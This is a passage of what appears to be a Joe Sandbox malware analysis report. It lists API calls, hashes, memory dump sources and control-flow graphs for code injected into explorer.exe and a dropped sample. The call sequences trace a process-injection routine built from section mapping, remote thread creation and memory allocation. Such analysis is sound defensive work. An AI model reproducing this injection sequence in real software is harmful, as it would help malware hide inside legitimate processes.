                                                                                                                            • Instruction Fuzzy Hash: 84419030B14F188FEB64EF3890597AE72D2EBA8306F104A6E905FC6245CF749A029745

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetTokenInformation.KERNELBASE ref: 08824B24
                                                                                                                            • GetTokenInformation.KERNELBASE ref: 08824B5B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4114910276-0
                                                                                                                            • Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                            • Instruction ID: abcfe3b815512156517c8dcc7ddbbf627d8e37e23ee46f9ba4c5b2276c19363e
                                                                                                                            • Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                            • Instruction Fuzzy Hash: AD213E34608A188FC754EB2CC49866AB7E1FB99311B044A6EA49AC7364DA30D845DB82

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetTokenInformation.KERNELBASE ref: 00B24B24
                                                                                                                            • GetTokenInformation.KERNELBASE ref: 00B24B5B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4114910276-0
                                                                                                                            • Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                            • Instruction ID: f686ac0c87df2318d99b5038034dafb5bc92d1783e6b31d81d823f7563b1026b
                                                                                                                            • Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                            • Instruction Fuzzy Hash: 4E213E30608A188FC754EB28D49866AB7E1FB99311B044A6EA49EC7264DB30D845DB82

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 515 8823c84-8823c9b 516 8823ca1-8823cb3 CreateToolhelp32Snapshot 515->516 517 8823d3b-8823d54 515->517 518 8823d23-8823d35 SleepEx 516->518 519 8823cb5-8823ccb 516->519 518->516 518->517 521 8823d16-8823d18 519->521 522 8823d1a-8823d1b 521->522 523 8823ccd-8823ce4 call 8825140 521->523 522->518 526 8823ce6-8823ce8 523->526 527 8823cea-8823cf8 526->527 528 8823cfc-8823d03 call 88247a4 526->528 527->526 529 8823cfa 527->529 531 8823d08-8823d0e 528->531 529->531 531->521
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateSleepSnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 684154974-0
                                                                                                                            • Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                            • Instruction ID: 993ab06092f0f82af6aac198d05f27c91309f96db6f51445535df99c700cf7d7
                                                                                                                            • Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                            • Instruction Fuzzy Hash: 5621B730118A19CFDB14EF64C0987AA72D2FB88316F14077ED84FDE295DB3885858711

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 535 8823d60-8823d70 536 8823d72-8823d94 EnumWindows SleepEx 535->536 537 8823d96-8823da4 535->537 536->536 536->537
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumSleepWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 498413330-0
                                                                                                                            • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                            • Instruction ID: 89ae56aaee867e25cb7b3c9fab380dc06f1c911f054767da0e26bf57f014ff8a
                                                                                                                            • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                            • Instruction Fuzzy Hash: 84E04F30514A09DFEB28ABA4C0DCBB032A1EB18206F14017EDC0EDD696CB7A4985C720

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 532 b23d60-b23d70 533 b23d72-b23d94 EnumWindows SleepEx 532->533 534 b23d96-b23da4 532->534 533->533 533->534
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumSleepWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 498413330-0
                                                                                                                            • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                            • Instruction ID: aa404ffd951bc0a08d74d2d8c412e3e5b18333feb4eb4cfd17dfb47e17d00fe4
                                                                                                                            • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                            • Instruction Fuzzy Hash: 23E04F30514A098FEB28AFA4C0DCBB032E1EB18346F1401BADC1EDD295CB7A4945C720
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                                            • Instruction ID: 2477341f9ced0c3b41abc705c318f91db389dfef92b3314833f1b80210f778fe
                                                                                                                            • Opcode Fuzzy Hash: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                                            • Instruction Fuzzy Hash: 99D18030718F198BDB64EB68E4466AEB7E2FB98701F10456DE44EC3241DF74E8468B86
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInstance
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 542301482-0
                                                                                                                            • Opcode ID: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                            • Instruction ID: 0707bdc830b12f5c0f99c526670df8a16a17571448f7e2e7eb1be34744a313ea
                                                                                                                            • Opcode Fuzzy Hash: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                            • Instruction Fuzzy Hash: F1E11934608A4CCFCB94EF28C895EA9B7F1FFA9305F114699E44ACB265DB30E944CB41
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                            • Instruction ID: 5123bc50a819d9d6e47c0428887ac05683df0c895dedacdb8369dd701fc6768e
                                                                                                                            • Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                            • Instruction Fuzzy Hash: D0415E30718A6C8FDBA8AF6C945836E75D2EBCC312F54417EA80EC3385DE749D468786
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                            • Instruction ID: 666f7bfa8f58ce91f9a9fa5d13d18854100f29600b97668d912d1b94623964fd
                                                                                                                            • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                            • Instruction Fuzzy Hash: 6841D63071CF1D9FD79CEA6C945937AB2C2FB99222F14026E989BC3355DE649C5243C2
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                            • Instruction ID: 9ab5c897b0289e7aa7c49c865395856a86c48b2c300163312993f97361850f30
                                                                                                                            • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                            • Instruction Fuzzy Hash: F541B33071CE1D4FD758EA6CA45937AB2C2EB88711F1402AEA4AFC3345DE789C0643C2
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3660427363-0
                                                                                                                            • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                            • Instruction ID: b119464cc8ce8d09548e2add4e1b5713d85048ea9e5e6e6ce1386a962098fc38
                                                                                                                            • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                            • Instruction Fuzzy Hash: 6231C635608A2CCFDB18EF6CD8896E977D1FB98315B00027EE84AC3645EE7098468791
                                                                                                                            APIs
                                                                                                                            • GetVolumeInformationA.KERNEL32 ref: 08824D8D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationVolume
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2039140958-0
                                                                                                                            • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                            • Instruction ID: 22c2df712bf42758e1f4e0813b60825b8f75e4a4a2523d4119c9f6f7de2eee70
                                                                                                                            • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                            • Instruction Fuzzy Hash: E8313531618A4C8FDBA4EF68C448BAA77E1FBD8311F10466E984EC7364DE70D945CB82
                                                                                                                            APIs
                                                                                                                            • GetVolumeInformationA.KERNEL32 ref: 00B24D8D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationVolume
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2039140958-0
                                                                                                                            • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                            • Instruction ID: 5abd490d28174bbf70985e413e22215cfa155ea5d0a01e0f420b6b8190042fac
                                                                                                                            • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                            • Instruction Fuzzy Hash: EA318530618E4C8FDB64EF28D449BAA77E1FBD8311F10466EA84EC7265DE30D945CB82
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 08821A60: RtlCreateHeap.NTDLL ref: 08821B77
                                                                                                                            • SleepEx.KERNEL32(?,?,?,?,?,?,?,08821A03), ref: 08821A30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Offset: 08821000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_8821000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHeapSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 221814145-0
                                                                                                                            • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                            • Instruction ID: f58d40a635bcf64fdd621f1a0efc4b92107d1465929bdd3aaeec5e20bd365764
                                                                                                                            • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                            • Instruction Fuzzy Hash: D4E04828714A1CCBDB98BB7C95C832CB190D7C8252F6015BEA51FC6285D925D9C14312
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00B21A60: RtlCreateHeap.NTDLL ref: 00B21B77
                                                                                                                            • SleepEx.KERNEL32(?,?,?,?,?,?,?,00B21A03), ref: 00B21A30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B21000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_b21000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHeapSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 221814145-0
                                                                                                                            • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                            • Instruction ID: f5d6e97db72c993250304dd11f687539f2ecc558385b1612ce92a374ccf2815f
                                                                                                                            • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                            • Instruction Fuzzy Hash: E3E04F20715A1C5BDBA8BBBCB4C532C61D0DBE9350F901DF9792ECA286E825CD818312

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:8.1%
                                                                                                                            Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:156
                                                                                                                            Total number of Limit Nodes:6
                                                                                                                            execution_graph 4186 402e42 4189 402e47 4186->4189 4187 402f18 4188 401902 8 API calls 4187->4188 4191 402f4c 4187->4191 4188->4191 4189->4187 4190 4020ea NtQuerySystemInformation 4189->4190 4189->4191 4190->4187 4134 7b003c 4135 7b0049 4134->4135 4147 7b0e0f SetErrorMode SetErrorMode 4135->4147 4140 7b0265 4141 7b02ce VirtualProtect 4140->4141 4143 7b030b 4141->4143 4142 7b0439 VirtualFree 4146 7b04be LoadLibraryA 4142->4146 4143->4142 4145 7b08c7 4146->4145 4148 7b0223 4147->4148 4149 7b0d90 4148->4149 4150 7b0dad 4149->4150 4151 7b0dbb GetPEB 4150->4151 4152 7b0238 VirtualAlloc 4150->4152 4151->4152 4152->4140 4345 418986 4346 418990 4345->4346 4347 418940 SetPriorityClass 4346->4347 4348 4189ad 4346->4348 4347->4346 4292 40190e 4293 401912 4292->4293 4295 4018b5 4292->4295 4294 401946 Sleep 4293->4294 4296 401961 4294->4296 4297 401529 7 API calls 4296->4297 4298 401972 4296->4298 4297->4298 4058 7efe6e 4059 7efe72 4058->4059 4062 7efeb7 4058->4062 4063 7efe7f 4059->4063 4064 7efe8e 4063->4064 4067 7f061f 4064->4067 4070 7f063a 4067->4070 4068 7f0643 CreateToolhelp32Snapshot 4069 7f065f Module32First 4068->4069 4068->4070 4071 7f066e 4069->4071 4072 7efe7e 4069->4072 4070->4068 4070->4069 4074 7f02de 4071->4074 4075 7f0309 4074->4075 4076 7f031a VirtualAlloc 4075->4076 4077 7f0352 4075->4077 4076->4077 4077->4077 4299 7b092b GetPEB 4300 7b0972 4299->4300 4078 418ed0 4081 418a70 4078->4081 4080 418ed5 4082 418a7d 4081->4082 4083 418b80 7 API calls 4082->4083 4084 418cc6 4082->4084 4086 418bf8 7 API calls 4083->4086 4085 418cd4 SetCommState 4084->4085 4091 418ced 4084->4091 4085->4084 4087 418ca4 4086->4087 4088 418c98 ObjectPrivilegeAuditAlarmW 4086->4088 4089 418cb5 4087->4089 4090 418cad WaitForSingleObject 4087->4090 4088->4087 4089->4084 4090->4089 4092 418daa 4091->4092 4093 418cfa 9 API calls 4091->4093 4105 418740 LocalAlloc 4092->4105 4100 418d88 4093->4100 4097 418dfd 4107 4189d0 4097->4107 4098 418daf LoadLibraryA 4106 418770 GetModuleHandleW GetProcAddress VirtualProtect 4098->4106 4100->4092 4101 418e02 4102 418e43 InterlockedCompareExchange 4101->4102 4103 418e23 MoveFileW 4101->4103 4104 418e5d 4101->4104 4102->4101 4103->4101 4104->4080 4105->4098 4106->4097 4108 4189f9 QueryDosDeviceW 4107->4108 4109 418a0a 4107->4109 4108->4109 4118 418910 4109->4118 4112 418a25 4121 418950 4112->4121 4113 418a1d FreeEnvironmentStringsA 4113->4112 4116 418a57 4116->4101 4117 418a3c HeapCreate GetNumaProcessorNode 4117->4116 4119 418921 FatalAppExitA GetModuleHandleA 4118->4119 4120 418933 4118->4120 4119->4120 4120->4112 4120->4113 4122 41896c 4121->4122 4123 41895e BuildCommDCBA 4121->4123 4124 418974 FreeEnvironmentStringsA 4122->4124 4127 41897c 4122->4127 4123->4127 4124->4127 4125 4189ad 4125->4116 4125->4117 4127->4125 4128 418940 4127->4128 4131 4188c0 4128->4131 4132 4188eb 4131->4132 4133 4188dc SetPriorityClass 4131->4133 4132->4127 4133->4132 4198 4014db 4199 40148f 4198->4199 4207 401469 4198->4207 4199->4198 4200 4015d5 NtDuplicateObject 4199->4200 4199->4207 4201 4015f2 NtCreateSection 4200->4201 4200->4207 4202 401672 NtCreateSection 4201->4202 4203 401618 NtMapViewOfSection 4201->4203 4204 40169e 4202->4204 4202->4207 4203->4202 4205 40163b NtMapViewOfSection 4203->4205 4206 4016a8 NtMapViewOfSection 4204->4206 4204->4207 4205->4202 4208 401659 4205->4208 4206->4207 4209 4016cf NtMapViewOfSection 4206->4209 4208->4202 4209->4207 4305 401922 4306 401930 4305->4306 4307 401946 Sleep 4306->4307 4308 401961 4307->4308 4309 401529 7 API calls 4308->4309 4310 401972 4308->4310 4309->4310 4327 401534 4328 401546 4327->4328 4329 4015d5 NtDuplicateObject 4328->4329 4336 4016f1 4328->4336 4330 4015f2 NtCreateSection 4329->4330 4329->4336 4331 401672 NtCreateSection 4330->4331 4332 401618 NtMapViewOfSection 4330->4332 4333 40169e 4331->4333 4331->4336 4332->4331 4334 40163b NtMapViewOfSection 4332->4334 4335 4016a8 NtMapViewOfSection 4333->4335 4333->4336 4334->4331 4337 401659 4334->4337 4335->4336 4338 4016cf NtMapViewOfSection 4335->4338 4337->4331 4338->4336 4153 402ffa 4154 40313d 4153->4154 4155 403024 4153->4155 4155->4154 4156 4030df RtlCreateUserThread NtTerminateProcess 4155->4156 4156->4154 4157 402ebc 4158 402eb4 4157->4158 4159 402f18 4158->4159 4162 402f4c 4158->4162 4163 4020ea 4158->4163 4159->4162 4168 401902 4159->4168 4164 4020fb 4163->4164 4165 40214e 4164->4165 4166 402152 NtQuerySystemInformation 4164->4166 4167 40216e 4164->4167 4165->4164 4165->4166 4166->4165 4167->4159 4169 401913 4168->4169 4170 401946 Sleep 4169->4170 4171 401961 4170->4171 4173 401972 4171->4173 4174 401529 4171->4174 4173->4162 4175 401539 4174->4175 4176 4015d5 NtDuplicateObject 4175->4176 4178 4016f1 4175->4178 4177 4015f2 NtCreateSection 4176->4177 4176->4178 4179 401672 NtCreateSection 4177->4179 4180 401618 NtMapViewOfSection 4177->4180 4178->4173 4179->4178 4181 40169e 4179->4181 4180->4179 4182 40163b NtMapViewOfSection 4180->4182 4181->4178 4183 4016a8 NtMapViewOfSection 4181->4183 4182->4179 4185 401659 4182->4185 4183->4178 4184 4016cf NtMapViewOfSection 4183->4184 4184->4178 4185->4179 4210 4020fc 4211 402107 4210->4211 4212 402152 NtQuerySystemInformation 4211->4212 4213 40216e 4211->4213 4212->4211

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 11 418b48-418b4e 9->11 12 418b50-418b56 11->12 13 418b5c-418b66 11->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->11 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 22 418ca4-418cab 17->22 23 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->23 19 418cd4-418ce2 SetCommState 18->19 26 418ce4-418ceb 19->26 27 418ced-418cf4 19->27 24 418cb5-418cc3 22->24 25 418cad-418caf WaitForSingleObject 22->25 23->22 24->18 25->24 26->19 26->27 28 418daa-418db9 call 418740 27->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 27->29 35 418dbb-418dcc 28->35 36 418ded-418df8 LoadLibraryA call 418770 28->36 29->28 39 418dd0-418de0 35->39 40 418dfd-418e0e call 4189d0 36->40 41 418de2 39->41 42 418de8-418deb 39->42 47 418e10-418e17 40->47 41->42 42->36 42->39 48 418e19-418e27 MoveFileW 47->48 49 418e2d-418e33 47->49 48->49 51 418e35 call 418760 49->51 52 418e3a-418e41 49->52 51->52 55 418e43-418e4e InterlockedCompareExchange 52->55 56 418e54-418e5b 52->56 55->56 56->47 57 418e5d-418e6d 56->57 58 418e70-418e80 57->58 60 418e82 58->60 61 418e89-418e8c 58->61 60->61 61->58 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                                                                                                                            • GetFocus.USER32 ref: 00418B91
                                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                                                                                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                                                                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                                                                                                                            • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                                                                                                                            • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                                                                                                                            • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                                                                                                                            • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
                                                                                                                            • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                                                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                                                                                                                            • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                                                                                                                            • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                                                                                                                            • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                                                                                                                            • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                                                                                                                            • LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937112624.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                            • String ID: k`$}$
                                                                                                                            • API String ID: 2220722107-956986773
                                                                                                                            • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                            • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                                                                                                                            • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                            • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
